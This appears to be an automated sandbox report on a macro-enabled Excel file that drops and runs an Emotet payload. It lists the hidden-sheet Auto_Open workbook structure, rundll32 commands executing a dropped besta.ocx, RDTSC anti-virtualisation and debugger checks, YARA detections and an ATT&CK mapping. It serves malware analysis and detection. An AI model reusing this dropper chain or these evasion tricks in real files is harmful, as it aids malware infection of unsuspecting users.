                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F68AD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030B0BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FF4A5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00303ABE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_003004A4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FAEB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_003056A9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F3085
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FC69B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FF699
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FD899
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FA8E8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_003120F8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FE6FD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FBEF5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00310AD3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00307EDD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F54C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00303130
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FB12E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030473A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F6125
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F7739
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FE336
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030CF2C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00308518
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00313306
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F4716
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030D10B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F5314
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F8112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030710D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030C772
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F196D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F996C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F5166
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FDD66
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F9565
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00305B7C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030F561
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00312560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F597D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F2B7C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F2176
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F2575
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F4F42
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F635F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030C145
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F8D59
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0031314A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00312D4F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F33A9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030BFA1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_003077A7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F938F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00306B91
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F7D87
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FF984
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00311987
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FFBEF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002FB7EC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_003091F7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030D5FE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F6BFE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_003135E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F1DF9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0030E7DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F2DC5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_003089DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_003013DB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F5DC3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F39C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00304DC5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00300FC5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E415980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E416100
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E43AE28
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E441F65
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E422C70
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E431D50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E412D10
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E42FD1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4458EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E41E6B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4457CB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E440569
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E42C366
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E419380
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E42C132
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E424F90 appears 52 times
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E411230 ntlbxpnmpq,
                    Source: B960.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                    Source: FILE_915494026923219.xlsmMacro extractor: Sheet name: Buk2
                    Source: FILE_915494026923219.xlsmMacro extractor: Sheet name: Buk5
                    Source: FILE_915494026923219.xlsmMacro extractor: Sheet name: Buk1
                    Source: FILE_915494026923219.xlsmMacro extractor: Sheet name: Buk7
                    Source: FILE_915494026923219.xlsmMacro extractor: Sheet name: EF1E4WF
                    Source: FILE_915494026923219.xlsmMacro extractor: Sheet name: Buk3
                    Source: FILE_915494026923219.xlsmMacro extractor: Sheet name: Buk4
                    Source: FILE_915494026923219.xlsmMacro extractor: Sheet name: Buk6
                    Source: workbook.xmlBinary string: \Desktop\Fil\30n\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{28F2A89B-0495-4B3B-BAD4-1D9C1E28F846}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EF1E4WF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EF1E4WF!$D$3</definedName><definedName name="SASA">EF1E4WF!$D$17</definedName><definedName name="SASA1">EF1E4WF!$D$19</definedName><definedName name="SASA2">EF1E4WF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EF1E4WF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                    Source: FILE_915494026923219.xlsmReversingLabs: Detection: 22%
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4022966435
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4022966435
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$FILE_915494026923219.xlsmJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD49C.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@5/6@1/30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E41AF10 CoCreateInstance,OleRun,
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4022966435
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E415980 GetTickCount64,FindResourceA,
                    Source: EXCEL.EXE, 00000000.00000002.745031381.0000000005060000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.588445230.0000000001E60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740536430.0000000001E60000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: FILE_915494026923219.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
                    Source: FILE_915494026923219.xlsmInitial sample: OLE zip file path = xl/media/image1.png
                    Source: FILE_915494026923219.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
                    Source: FILE_915494026923219.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
                    Source: FILE_915494026923219.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
                    Source: FILE_915494026923219.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
                    Source: FILE_915494026923219.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: B960.tmp.0.drInitial sample: OLE indicators vbamacros = False
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F150F push ds; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_002F151C push ds; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E424FE0 push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4473E1 push ecx; ret
                    Source: besta.ocx.0.drStatic PE information: real checksum: 0x75999 should be: 0x74343
                    Source: gb[1].dll.0.drStatic PE information: real checksum: 0x75999 should be: 0x74343
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gb[1].dllJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file

                    Boot Survival:

                    barindex
                    Drops PE files to the user root directoryShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Tries to detect virtualization through RDTSC time measurementsShow sources
                    Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000006E416134 second address: 000000006E416168 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-08h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FD5A8FC0564h 0x0000000a mov edi, 00D66F8Ch 0x0000000f mov dword ptr [ebp-14h], edi 0x00000012 rdtscp
                    Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000006E4179F7 second address: 000000006E417A0A instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FD5A8FADBAEh 0x00000007 rdtscp
                    Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000006E417A0A second address: 000000006E4179F7 instructions: 0x00000000 rdtscp 0x00000003 mov ecx, dword ptr [esp+0Ch] 0x00000007 ror esi, 0Dh 0x0000000a mov eax, esi 0x0000000c pop esi 0x0000000d xor ecx, esp 0x0000000f call 00007FD5A8FCCC87h 0x00000014 cmp ecx, dword ptr [6E45D008h] 0x0000001a jne 00007FD5A8FC0543h 0x0000001c ret 0x0000001d mov esp, ebp 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov cl, byte ptr [esi] 0x00000023 mov edi, eax 0x00000025 cmp cl, 00000061h 0x00000028 jc 00007FD5A8FC054Fh 0x0000002a movzx eax, cl 0x0000002d add edi, FFFFFFE0h 0x00000030 add edi, eax 0x00000032 jmp 00007FD5A8FC06A2h 0x00000037 mov eax, dword ptr [ebp-14h] 0x0000003a mov ecx, dword ptr [ebp-18h] 0x0000003d cdq 0x0000003e sub eax, edx 0x00000040 sar eax, 1 0x00000042 cmp eax, ecx 0x00000044 jl 00007FD5A8FC070Eh 0x0000004a add ebx, 0000FFFFh 0x00000050 inc esi 0x00000051 test bx, bx 0x00000054 jne 00007FD5A8FC039Eh 0x0000005a mov eax, dword ptr [ebp-14h] 0x0000005d cmp eax, ecx 0x0000005f cmovle eax, ecx 0x00000062 mov ecx, edi 0x00000064 mov dword ptr [ebp-14h], eax 0x00000067 call 00007FD5A8FC1AA3h 0x0000006c push ebp 0x0000006d mov ebp, esp 0x0000006f and esp, FFFFFFF8h 0x00000072 sub esp, 0Ch 0x00000075 mov eax, dword ptr [6E45D008h] 0x0000007a xor eax, esp 0x0000007c mov dword ptr [esp+08h], eax 0x00000080 push esi 0x00000081 mov esi, ecx 0x00000083 rdtscp
                    Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000006E416134 second address: 000000006E416168 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-08h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FD5A8FADBC4h 0x0000000a mov edi, 00D66F8Ch 0x0000000f mov dword ptr [ebp-14h], edi 0x00000012 rdtscp
                    Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000006E4179F7 second address: 000000006E417A0A instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FD5A8FC054Eh 0x00000007 rdtscp
                    Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000006E417A0A second address: 000000006E4179F7 instructions: 0x00000000 rdtscp 0x00000003 mov ecx, dword ptr [esp+0Ch] 0x00000007 ror esi, 0Dh 0x0000000a mov eax, esi 0x0000000c pop esi 0x0000000d xor ecx, esp 0x0000000f call 00007FD5A8FBA2E7h 0x00000014 cmp ecx, dword ptr [6E45D008h] 0x0000001a jne 00007FD5A8FADBA3h 0x0000001c ret 0x0000001d mov esp, ebp 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov cl, byte ptr [esi] 0x00000023 mov edi, eax 0x00000025 cmp cl, 00000061h 0x00000028 jc 00007FD5A8FADBAFh 0x0000002a movzx eax, cl 0x0000002d add edi, FFFFFFE0h 0x00000030 add edi, eax 0x00000032 jmp 00007FD5A8FADD02h 0x00000037 mov eax, dword ptr [ebp-14h] 0x0000003a mov ecx, dword ptr [ebp-18h] 0x0000003d cdq 0x0000003e sub eax, edx 0x00000040 sar eax, 1 0x00000042 cmp eax, ecx 0x00000044 jl 00007FD5A8FADD6Eh 0x0000004a add ebx, 0000FFFFh 0x00000050 inc esi 0x00000051 test bx, bx 0x00000054 jne 00007FD5A8FAD9FEh 0x0000005a mov eax, dword ptr [ebp-14h] 0x0000005d cmp eax, ecx 0x0000005f cmovle eax, ecx 0x00000062 mov ecx, edi 0x00000064 mov dword ptr [ebp-14h], eax 0x00000067 call 00007FD5A8FAF103h 0x0000006c push ebp 0x0000006d mov ebp, esp 0x0000006f and esp, FFFFFFF8h 0x00000072 sub esp, 0Ch 0x00000075 mov eax, dword ptr [6E45D008h] 0x0000007a xor eax, esp 0x0000007c mov dword ptr [esp+08h], eax 0x00000080 push esi 0x00000081 mov esi, ecx 0x00000083 rdtscp
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gb[1].dllJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6743 rdtsc
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E43BA20 FindFirstFileExW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E424E67 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E42744C GetProcessHeap,HeapFree,
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6743 rdtsc
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00304315 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E416100 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E416100 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E434F94 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E417A30 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E43B715 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E427334 mov esi, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E424E67 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E42461A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E42D436 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: Yara matchFile source: app.xml, type: SAMPLE
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
                    Source: EXCEL.EXE, 00000000.00000002.740745216.0000000000840000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740503044.0000000000A60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: EXCEL.EXE, 00000000.00000002.740745216.0000000000840000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740503044.0000000000A60000.00000002.00020000.sdmpBinary or memory string: !Progman
                    Source: EXCEL.EXE, 00000000.00000002.740745216.0000000000840000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.740503044.0000000000A60000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E424C86 cpuid
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E424FF7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 6.2.rundll32.exe.480de0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.430ce0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.rundll32.exe.480de0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.430ce0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.588333443.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.588398345.000000000041D000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.740442546.000000000046D000.00000004.00000020.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsScripting1Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery13Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsSystem Information Discovery123SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

